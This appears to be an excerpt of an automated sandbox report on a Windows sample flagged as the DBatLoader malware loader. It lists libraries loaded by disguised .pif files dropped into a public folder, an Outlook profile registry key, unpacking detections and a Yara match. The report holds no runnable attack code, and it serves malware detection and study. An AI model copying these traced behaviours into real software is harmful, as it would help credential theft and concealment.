Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Automated click: Continue

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PWSW6GK3ZC.exe

Static file information: File size 1668608 > 1048576

Source: PWSW6GK3ZC.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x124400

Source:	Binary string: System.Windows.Forms.pdb source: fpnevlzQ.pif, 0000000D.00000002.3391955107.0000000022B10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: fpnevlzQ.pif, 0000000D.00000002.3391955107.0000000022B10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2101000543.000000007F110000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206CE000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
Source:	Binary string: _.pdb source: fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000008.00000000.2151389693.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, ndpha.pif.6.dr
Source:	Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000008.00000000.2151389693.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, ndpha.pif.6.dr
Source:	Binary string: easinvoker.pdbGCTL source: PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2112236025.0000000000703000.00000004.00000020.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2101000543.000000007F110000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2112236025.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206CE000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 7.2.fpnevlzQ.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 10.2.fpnevlzQ.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 13.2.fpnevlzQ.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 7.2.fpnevlzQ.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 10.2.fpnevlzQ.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Unpacked PE file: 13.2.fpnevlzQ.pif.400000.1.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.PWSW6GK3ZC.exe.237f278.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PWSW6GK3ZC.exe.237f278.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PWSW6GK3ZC.exe.28a0000.2.unpack, type: UNPACKEDPE
